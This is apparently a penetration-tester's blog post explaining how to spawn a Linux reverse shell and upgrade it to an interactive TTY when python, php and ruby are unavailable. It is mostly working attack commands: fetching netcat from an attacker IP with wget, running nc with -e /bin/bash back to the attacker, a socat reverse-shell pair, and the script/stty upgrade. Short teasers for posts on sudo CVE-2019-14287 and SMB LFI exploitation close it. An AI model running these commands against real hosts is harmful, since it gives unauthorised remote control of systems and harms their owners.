During a recent application exploit into an interactive shell the typical path to spawn a reverse shell and upgrade it to tty was sought.
It was found that the go to technologies such as python, php, socat, ruby were unavailable so the following steps were taken in order to spawn the reverse shell and upgrade to tty:
First of all if you do not wish to go through the hassle of having tty with bash completion etc then merely fire the following command into the pseudo terminal:
/usr/bin/script -qc /bin/bash /dev/null
Then merely Ctrl+z and execute:
stty raw -echo; fg; reset
This will break you out of the pseudo terminal into a tty shell and you can su and carry out all other terminal based commands; for those wanting to jump through a couple of hoops and obtain a tty shell due to the above not working 100% then one of many ways to do this is below.
Using wget and pythons SimpleHttpServer NC was easily moved over to the target:
Server: cd /tmp; wget http://10.x.x.x:9998/nc; chmod +x nc Server: ./nc 10.x.x.x 9998 -e /bin/bash
Attacking Machine: cp /usr/bin/nc .; python -m SimpleHttpServer 9998 Attacking Machine: nc -nlvp 9998
In order to upgrade our shell we first need to break out of the pseudo shell we are in.
First we will need to upgrade to a pty shell, generally I would default to trusty python using the following:
python -c 'import pty; pty.spawn("/bin/bash")'
Attacking Server: socat file:`tty`,raw,echo=0 tcp-listen:9998
Victim Machine: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.x.x.x:9998
As neither of our prefered technologies were available we can fall back onto a more simple but what seems to be a long forgotten way of upgrading, which is using script.
Our our attacking machine which has caught the reverse nc shell we can simply breakout of our pseudo shell using the following command:
Attacking Machine: /usr/bin/script -qc /bin/bash /dev/null
All that is left is to do the following:
A: CTRL + Z to background the shell
B: paste or type the following into the terminal on the attacking machine
stty raw -echo; fg; reset
Now you have a fully interactive shell with autocomplete and can continue to exploit the server and potentially execute su or local ssh commands on the server.
Granted there are many many more ways to achieve a the same shell, but using script seems to be overlooked quite often hence the post.
Exploiting Sudo 1.8.27 The following brief is a quick demonstration of the issue faced by cve-2019-14287. This issue is presented when the user is allowed to run a specified command as any user other than the root user account, specified …
SMB LFI Exploitation The following outlines a very short overview of LFI using SMB in form of a crib sheet. Install Samba: apt-get install samba Remove default Samba config: rm -f /etc/samba/smb.conf Create New smb.conf: vi /etc/samba/smb.conf The following config …
Linux reverse shell without python. During a recent application exploit into an interactive shell the typical path to spawn a reverse shell and upgrade it to tty was sought. It was found that the go to technologies such as python, …